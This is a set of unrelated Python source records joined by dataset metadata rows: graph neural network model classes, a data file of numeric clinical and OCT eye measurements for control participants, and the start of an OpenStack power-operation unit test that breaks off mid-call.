return None
def forward(self, graph):
#get the data
x = self.node_enc(graph.x) # Take all feats and encode
# e_feat = graph.x[:,[0,3]] # scale factor and virial mass
adj = graph.edge_index
e_encode=scatter_add(x[adj[0]],adj[1], dim=0)
# print(e_encode)
# print(e_encode.shape)
e = self.edge_enc(e_encode) #put in edge_attr
# print(e)
# print(e.shape)
# Initialize global features as 0:
u = zeros(
graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
)
#convolutions
batch = graph.batch
for op in self.convs:
x, e, _ = op(x, adj, e, u, batch)
if self.agg=='sum':
x = global_add_pool(x, batch)
if self.agg=='max':
x = global_max_pool(x, batch)
#decoder
x_out=[]
for norm, decode in zip(self.norms, self.decoders):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
x_out.append(x1)
x_out=cat(x_out, dim=1)
# variance
if self.variance:
sig=[]
for norm, decode in zip(self.sig_norms, self.sigs):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
sig.append(x1)
sig=abs(cat(sig, dim=1))
if self.rho!=0:
rho=[]
for norm, decode in zip(self.rho_norms, self.rhos):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
rho.append(x1)
rho=abs(cat(rho, dim=1)) ### not sure this works with only 1d
if self.variance:
if self.rho!=0:
return x_out, sig, tanh(rho)
else:
return x_out, sig
else:
return x_out
class MetaNode(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(MetaNode, self).__init__()
'''Same as above but with only node'''
self.encode=encode
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
self.convs.append(MetaLayer(edge_model=None, node_model=NodeNodeModel(hidden_channels), global_model=None))
for _ in range(int(conv_layers-1)):
self.convs.append(MetaLayer(edge_model=None, node_model=NodeNodeModel(hidden_channels), global_model=None))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
if self.decode_activation =='relu':
print('RelU decode activation')
act = ReLU()
return act
if self.decode_activation =='leakyrelu':
print('LeakyRelU decode activation')
act=LeakyReLU()
return act
if not self.decode_activation:
print("Please specify a decode activation function")
return None
def forward(self, graph):
#get the data
x = self.node_enc(graph.x) # Take all feats and encode
adj = graph.edge_index
e = graph.edge_attr.view(-1,1) # scale factor and virial mass
# e_encode=cat([graph.edge_attr.view(-1,1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
# e = self.edge_enc(e_encode) #put in edge_attr
# Initialize global features as 0:
u = zeros(
graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
)
#convolutions
batch = graph.batch
for op in self.convs:
x, _, _ = op(x, adj, e, u, batch)
if self.agg=='sum':
x = global_add_pool(x, batch)
if self.agg=='max':
x = global_max_pool(x, batch)
#decoder
x_out=[]
for norm, decode in zip(self.norms, self.decoders):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
x_out.append(x1)
x_out=cat(x_out, dim=1)
# variance
if self.variance:
sig=[]
for norm, decode in zip(self.sig_norms, self.sigs):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
sig.append(x1)
sig=abs(cat(sig, dim=1))
if self.rho!=0:
rho=[]
for norm, decode in zip(self.rho_norms, self.rhos):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
rho.append(x1)
rho=abs(cat(rho, dim=1)) ### not sure this works with only 1d
if self.variance:
if self.rho!=0:
return x_out, sig, tanh(rho)
else:
return x_out, sig
else:
return x_out
class PysrNet(Module):
def __init__(self, n_outs=3, hidden_channels=64, n_feat=5, n_targ=1):
super(PysrNet, self).__init__()
self.g1 = MLP(n_feat, n_outs, hidden = hidden_channels)
self.g2 = MLP(n_outs, n_outs, hidden = hidden_channels)
self.g3= MLP(n_outs, n_outs, hidden = hidden_channels)
self.f = MLP(n_outs, n_targ, hidden = hidden_channels)
def forward(self, x, edge_index, batch):
# 1. Obtain node embeddings
x = self.g1(x) # NODE ENCODER
# global adj, batch1, xe
adj = edge_index
# global neighbours
# global N_sum
# neighbours = x
# batch1=batch
N_sum = scatter_add(x[adj[0]],adj[1], dim=0) #ADD NEIGHBORHOOD NODES
xe = self.g2(N_sum) #ENCODE EDGE SUM
x[adj[1]]+=xe[adj[1]] #only add where we have receiving nodes TO UPDATA X
x = self.g3(x) #MLP ON EDGE ADDED FEATURES
x = global_add_pool(x, batch)
x = self.f(x)
return x
class MetaEdge(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(MetaEdge, self).__init__()
''' Same as above but no global model'''
self.encode=encode
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
self.edge_enc = MLP(3, hidden_channels, layer_norm=True)
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=None))
for _ in range(int(conv_layers-1)):
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=None))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
if self.decode_activation =='relu':
print('RelU decode activation')
act = ReLU()
return act
if self.decode_activation =='leakyrelu':
print('LeakyRelU decode activation')
act=LeakyReLU()
return act
if not self.decode_activation:
print("Please specify a decode activation function")
return None
def forward(self, graph):
#get the data
x = self.node_enc(graph.x) # Take all feats and encode
e_feat = graph.x[:,[0,3]] # scale factor and virial mass
adj = graph.edge_index
e_encode=cat([graph.edge_attr.view(-1,1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
e = self.edge_enc(e_encode) #put in edge_attr
# Initialize global features as 0:
u = zeros(
graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
)
#convolutions
batch = graph.batch
for op in self.convs:
x, e, _ = op(x, adj, e, u, batch)
if self.agg=='sum':
x = global_add_pool(x, batch)
if self.agg=='max':
x = global_max_pool(x, batch)
#decoder
x_out=[]
for norm, decode in zip(self.norms, self.decoders):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
x_out.append(x1)
x_out=cat(x_out, dim=1)
# variance
if self.variance:
sig=[]
for norm, decode in zip(self.sig_norms, self.sigs):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
sig.append(x1)
sig=abs(cat(sig, dim=1))
if self.rho!=0:
rho=[]
for norm, decode in zip(self.rho_norms, self.rhos):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
rho.append(x1)
rho=abs(cat(rho, dim=1)) ### not sure this works with only 1d
if self.variance:
if self.rho!=0:
return x_out, sig, tanh(rho)
else:
return x_out, sig
else:
return x_out
| 38.87664
| 166
| 0.544378
| 5,322
| 44,436
| 4.367531
| 0.055242
| 0.0783
| 0.041043
| 0.037429
| 0.875323
| 0.860781
| 0.847789
| 0.841421
| 0.838023
| 0.825159
| 0
| 0.011643
| 0.327392
| 44,436
| 1,143
| 167
| 38.87664
| 0.76606
| 0.096026
| 0
| 0.854192
| 0
| 0
| 0.029472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048603
| false
| 0
| 0.006075
| 0.001215
| 0.133657
| 0.030377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c09162bee5436b9a66ba797a032e600443982ce4
| 10,113
|
py
|
Python
|
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
fep_control_clinical = [[24, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4, 100, 0.17, 0.012, 97, 0.12, 0.007, 96, 138, 70, 137, 55, 129, 77, 131, 50, 266, 249, 258, 294, 272, 292, 259, 250, 247, 9.80, 273, 248, 9.90, 275, 77, 77],
[21, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1, 66, 0.07, 0.000, 85, 0.08, 0.000, 68, 57, 76, 80, 52, 94, 98, 99, 48, 286, 257, 265, 305, 282, 293, 263, 266, 242, 10.00, 278, 243, 10.00, 277, 80, 78],
[25, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4, 98, 0.52, 0.208, 92, 0.62, 0.391, 84, 133, 61, 125, 72, 132, 62, 107, 67, 278, 268, 265, 298, 272, 284, 263, 257, 242, 10.10, 279, 240, 9.90, 275, 81, 78],
[23, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4, 104, 0.58, 0.225, 110, 0.52, 0.183, 93, 129, 69, 135, 83, 122, 77, 148, 94, 278, 256, 261, 299, 282, 294, 260, 256, 258, 10.10, 281, 254, 10.10, 280, 87, 87],
[21, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1, 114, 0.55, 0.138, 115, 0.55, 0.181, 91, 132, 88, 147, 88, 138, 94, 147, 82, 310, 284, 288, 333, 308, 333, 291, 287, 296, 11.10, 308, 303, 11.20, 311, 94, 95],
[20, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1, 109, 0.36, 0.038, 108, 0.42, 0.071, 91, 143, 70, 150, 74, 148, 68, 137, 79, 292, 282, 275, 301, 287, 306, 277, 278, 288, 10.60, 294, 284, 10.80, 293, 90, 89],
[21, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4, 92, 0.45, 0.097, 94, 0.40, 0.063, 93, 122, 64, 119, 62, 119, 69, 125, 65, 274, 257, 262, 288, 280, 290, 262, 258, 246, 9.80, 272, 250, 9.90, 274, 77, 78],
[25, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4, 96, 0.43, 0.080, 97, 0.42, 0.065, 89, 105, 60, 132, 89, 102, 63, 134, 89, 288, 275, 284, 323, 291, 316, 277, 278, 291, 10.80, 299, 287, 10.80, 300, 84, 82],
[26, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4, 80, 0.38, 0.018, 91, 0.09, 0.000, 80, 95, 90, 79, 53, 97, 126, 72, 68, 269, 234, 228, 284, 262, 287, 241, 229, 235, 9.40, 260, 235, 9.30, 259, 68, 68],
[27, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5, 88, 0.30, 0.033, 88, 0.38, 0.060, 91, 107, 65, 121, 61, 105, 71, 111, 64, 294, 262, 269, 310, 291, 301, 264, 259, 281, 10.40, 288, 279, 10.30, 285, 82, 81],
[23, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4, 114, 0.67, 0.470, 115, 0.70, 0.593, 90, 128, 60, 166, 103, 129, 64, 151, 114, 307, 286, 289, 313, 306, 327, 293, 290, 231, 10.80, 299, 244, 11.00, 305, 94, 94],
[23, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4, 102, 0.49, 0.145, 103, 0.41, 0.082, 88, 119, 64, 145, 78, 125, 68, 135, 84, 303, 290, 292, 322, 295, 320, 298, 291, 263, 11.00, 306, 259, 11.00, 305, 85, 84],
[24, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1, 92, 0.58, 0.234, 95, 0.64, 0.305, 88, 102, 79, 118, 70, 92, 91, 126, 72, 273, 258, 264, 287, 275, 291, 262, 251, 252, 9.80, 273, 254, 9.80, 273, 78, 78],
[27, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4, 88, 0.61, 0.228, 85, 0.62, 0.257, 93, 111, 57, 118, 59, 107, 68, 112, 55, 260, 236, 246, 277, 254, 276, 250, 238, 244, 9.40, 262, 243, 9.40, 261, 76, 75],
[21, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1, 103, 0.38, 0.054, 106, 0.35, 0.045, 84, 119, 55, 139, 98, 125, 56, 145, 98, 298, 272, 284, 330, 298, 309, 272, 269, 256, 10.70, 296, 249, 10.30, 287, 87, 86],
[26, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4, 96, 0.48, 0.124, 95, 0.45, 0.106, 66, 118, 68, 112, 86, 118, 76, 121, 67, 272, 267, 278, 306, 273, 294, 257, 255, 255, 10.30, 286, 242, 10.00, 278, 83, 78],
[22, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4, 116, 0.58, 0.312, 115, 0.62, 0.410, 91, 156, 69, 163, 74, 156, 68, 165, 73, 312, 295, 315, 339, 306, 332, 299, 290, 226, 11.20, 311, 227, 11.20, 310, 96, 95],
[21, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1, 92, 0.34, 0.018, 98, 0.12, 0.002, 94, 117, 74, 123, 55, 112, 82, 136, 60, 280, 250, 270, 304, 281, 304, 266, 256, 221, 10.00, 279, 221, 10.10, 281, 85, 86],
[22, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1, 108, 0.56, 0.101, 107, 0.52, 0.150, 94, 129, 78, 154, 71, 130, 84, 150, 64, 269, 260, 262, 301, 266, 290, 251, 252, 249, 9.90, 275, 242, 9.70, 271, 87, 85],
[20, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1, 89, 0.66, 0.538, 90, 0.68, 0.541, 95, 125, 45, 121, 67, 129, 43, 119, 70, 272, 251, 254, 293, 267, 290, 258, 253, 274, 9.90, 274, 277, 9.90, 274, 79, 78]]
more_clinical = [[5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [6, 2, 1, 1], [2, 2, 2, 1], [5, 1, 2, 1], [6, 2, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [5, 1, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [4, 2, 2, 1], [5, 1, 2, 1], [3, 2, 2, 1], [3, 2, 2, 2]]
fep_control_full_clinical = [[2, 5, 1, 2, 1, 24, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4, 100, 0.17, 0.012, 97, 0.12, 0.007, 96, 138, 70, 137, 55, 129, 77, 131, 50, 266, 249, 258, 294, 272, 292, 259, 250, 247, 9.8, 273, 248, 9.9, 275, 77, 77], [2, 2, 2, 2, 1, 21, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1, 66, 0.07, 0.0, 85, 0.08, 0.0, 68, 57, 76, 80, 52, 94, 98, 99, 48, 286, 257, 265, 305, 282, 293, 263, 266, 242, 10.0, 278, 243, 10.0, 277, 80, 78], [1, 5, 1, 2, 1, 25, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4, 98, 0.52, 0.208, 92, 0.62, 0.391, 84, 133, 61, 125, 72, 132, 62, 107, 67, 278, 268, 265, 298, 272, 284, 263, 257, 242, 10.1, 279, 240, 9.9, 275, 81, 78], [2, 6, 2, 1, 1, 23, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4, 104, 0.58, 0.225, 110, 0.52, 0.183, 93, 129, 69, 135, 83, 122, 77, 148, 94, 278, 256, 261, 299, 282, 294, 260, 256, 258, 10.1, 281, 254, 10.1, 280, 87, 87], [1, 2, 2, 2, 1, 21, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1, 114, 0.55, 0.138, 115, 0.55, 0.181, 91, 132, 88, 147, 88, 138, 94, 147, 82, 310, 284, 288, 333, 308, 333, 291, 287, 296, 11.1, 308, 303, 11.2, 311, 94, 95], [1, 5, 1, 2, 1, 20, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1, 109, 0.36, 0.038, 108, 0.42, 0.071, 91, 143, 70, 150, 74, 148, 68, 137, 79, 292, 282, 275, 301, 287, 306, 277, 278, 288, 10.6, 294, 284, 10.8, 293, 90, 89], [2, 6, 2, 2, 1, 21, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4, 92, 0.45, 0.097, 94, 0.4, 0.063, 93, 122, 64, 119, 62, 119, 69, 125, 65, 274, 257, 262, 288, 280, 290, 262, 258, 246, 9.8, 272, 250, 9.9, 274, 77, 78], [1, 5, 1, 2, 1, 25, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4, 96, 0.43, 0.08, 97, 0.42, 0.065, 89, 105, 60, 132, 89, 102, 63, 134, 89, 288, 275, 284, 323, 291, 316, 277, 278, 291, 10.8, 299, 287, 10.8, 300, 84, 82], [2, 2, 2, 2, 1, 26, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4, 80, 0.38, 0.018, 91, 0.09, 0.0, 80, 95, 90, 79, 53, 97, 126, 72, 68, 269, 234, 228, 284, 262, 287, 241, 229, 235, 9.4, 260, 235, 9.3, 259, 68, 68], [2, 5, 1, 2, 1, 27, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5, 88, 0.3, 0.033, 88, 0.38, 0.06, 91, 107, 65, 121, 61, 105, 71, 111, 64, 294, 262, 269, 310, 291, 301, 264, 259, 281, 10.4, 288, 279, 10.3, 285, 82, 81], [2, 5, 1, 2, 1, 23, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4, 114, 0.67, 0.47, 115, 0.7, 0.593, 90, 128, 60, 166, 103, 129, 64, 151, 114, 307, 286, 289, 313, 306, 327, 293, 290, 231, 10.8, 299, 244, 11.0, 305, 94, 94], [2, 5, 1, 2, 1, 23, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4, 102, 0.49, 0.145, 103, 0.41, 0.082, 88, 119, 64, 145, 78, 125, 68, 135, 84, 303, 290, 292, 322, 295, 320, 298, 291, 263, 11.0, 306, 259, 11.0, 305, 85, 84], [2, 2, 2, 2, 1, 24, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1, 92, 0.58, 0.234, 95, 0.64, 0.305, 88, 102, 79, 118, 70, 92, 91, 126, 72, 273, 258, 264, 287, 275, 291, 262, 251, 252, 9.8, 273, 254, 9.8, 273, 78, 78], [1, 5, 1, 2, 1, 27, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4, 88, 0.61, 0.228, 85, 0.62, 0.257, 93, 111, 57, 118, 59, 107, 68, 112, 55, 260, 236, 246, 277, 254, 276, 250, 238, 244, 9.4, 262, 243, 9.4, 261, 76, 75], [2, 2, 2, 2, 1, 21, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1, 103, 0.38, 0.054, 106, 0.35, 0.045, 84, 119, 55, 139, 98, 125, 56, 145, 98, 298, 272, 284, 330, 298, 309, 272, 269, 256, 10.7, 296, 249, 10.3, 287, 87, 86], [1, 5, 1, 2, 1, 26, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4, 96, 0.48, 0.124, 95, 0.45, 0.106, 66, 118, 68, 112, 86, 118, 76, 121, 67, 272, 267, 278, 306, 273, 294, 257, 255, 255, 10.3, 286, 242, 10.0, 278, 83, 78], [1, 4, 2, 2, 1, 22, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4, 116, 0.58, 0.312, 115, 0.62, 0.41, 91, 156, 69, 163, 74, 156, 68, 165, 73, 312, 295, 315, 339, 306, 332, 299, 290, 226, 11.2, 311, 227, 11.2, 310, 96, 95], [2, 5, 1, 2, 1, 21, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1, 92, 0.34, 0.018, 98, 0.12, 0.002, 94, 117, 74, 123, 55, 112, 82, 136, 60, 280, 250, 270, 304, 281, 304, 266, 256, 221, 10.0, 279, 221, 10.1, 281, 85, 86], [1, 3, 2, 2, 1, 22, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1, 108, 0.56, 0.101, 107, 0.52, 0.15, 94, 129, 78, 154, 71, 130, 84, 150, 64, 269, 260, 262, 301, 266, 290, 251, 252, 249, 9.9, 275, 242, 9.7, 271, 87, 85], [1, 3, 2, 2, 2, 20, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1, 89, 0.66, 0.538, 90, 0.68, 0.541, 95, 125, 45, 121, 67, 129, 43, 119, 70, 272, 251, 254, 293, 267, 290, 258, 253, 274, 9.9, 274, 277, 9.9, 274, 79, 78]]
sex = [2, 2, 1, 2, 1, 1, 2, 1, 2, 2, 2, 2, 2, 1, 2, 1, 1, 2, 1, 1]
# Age, Sex, Race, Simp_Race, Ethnicity, Handedness, WTAR_raw, WTAR_scaled, Corrected_vision, OSLogMar, ODLogMar, BinocularLogMar, Education, Degree
fep_control_clinical_only = [[24, 2, 5, 1, 2, 1, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4], [21, 2, 2, 2, 2, 1, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1], [25, 1, 5, 1, 2, 1, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4], [23, 2, 6, 2, 1, 1, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4], [21, 1, 2, 2, 2, 1, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1], [20, 1, 5, 1, 2, 1, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1], [21, 2, 6, 2, 2, 1, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4], [25, 1, 5, 1, 2, 1, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4], [26, 2, 2, 2, 2, 1, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4], [27, 2, 5, 1, 2, 1, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5], [23, 2, 5, 1, 2, 1, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4], [23, 2, 5, 1, 2, 1, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4], [24, 2, 2, 2, 2, 1, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1], [27, 1, 5, 1, 2, 1, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4], [21, 2, 2, 2, 2, 1, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1], [26, 1, 5, 1, 2, 1, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4], [22, 1, 4, 2, 2, 1, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4], [21, 2, 5, 1, 2, 1, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1], [22, 1, 3, 2, 2, 1, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1], [20, 1, 3, 2, 2, 2, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1]]
# full = []
# for i in range(len(sex)):
# fep_control_full_clinical[i].insert(0, sex[i])
# # full.append(more_clinical[i] + fep_control_clinical[i])
# print(fep_control_full_clinical)
| 288.942857
| 4,213
| 0.505884
| 2,562
| 10,113
| 1.98829
| 0.113583
| 0.053004
| 0.051237
| 0.040047
| 0.782097
| 0.758343
| 0.746761
| 0.740283
| 0.737142
| 0.737142
| 0
| 0.60486
| 0.218728
| 10,113
| 35
| 4,214
| 288.942857
| 0.039868
| 0.032236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c0999c2b2be1a636cc0bcc03cdf9efbc0e864b23
| 4,986
|
py
|
Python
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2016-07-06T19:59:33.000Z
|
2016-07-06T19:59:33.000Z
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 256
|
2016-07-06T17:02:55.000Z
|
2020-10-01T09:35:03.000Z
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2017-05-16T20:24:57.000Z
|
2017-05-16T20:24:57.000Z
|
from unittest import TestCase
from mock import Mock
from cloudshell.cp.openstack.command.operations.power_operation import PowerOperation
class TestPowerOperation(TestCase):
def setUp(self):
self.instance_service = Mock()
self.power_operation = PowerOperation(instance_service=self.instance_service)
self.power_operation.instance_waiter = Mock()
self.power_operation.instance_service = Mock()
self.openstack_session = Mock()
self.cloudshell_session = Mock()
def test_power_on_instance_not_powered(self):
deployed_app_resource = Mock()
# deployed_app_resource.vmdetails = Mock()
deployed_app_resource.vmdetails.uid = '111'
resource_fullname = '1234'
mock_logger = Mock()
self.power_operation.power_on(openstack_session=self.openstack_session,
cloudshell_session=self.cloudshell_session,
deployed_app_resource=deployed_app_resource,
resource_fullname=resource_fullname,
logger=mock_logger)
self.power_operation.instance_service.instance_power_on.assert_called_with(openstack_session=self.openstack_session,
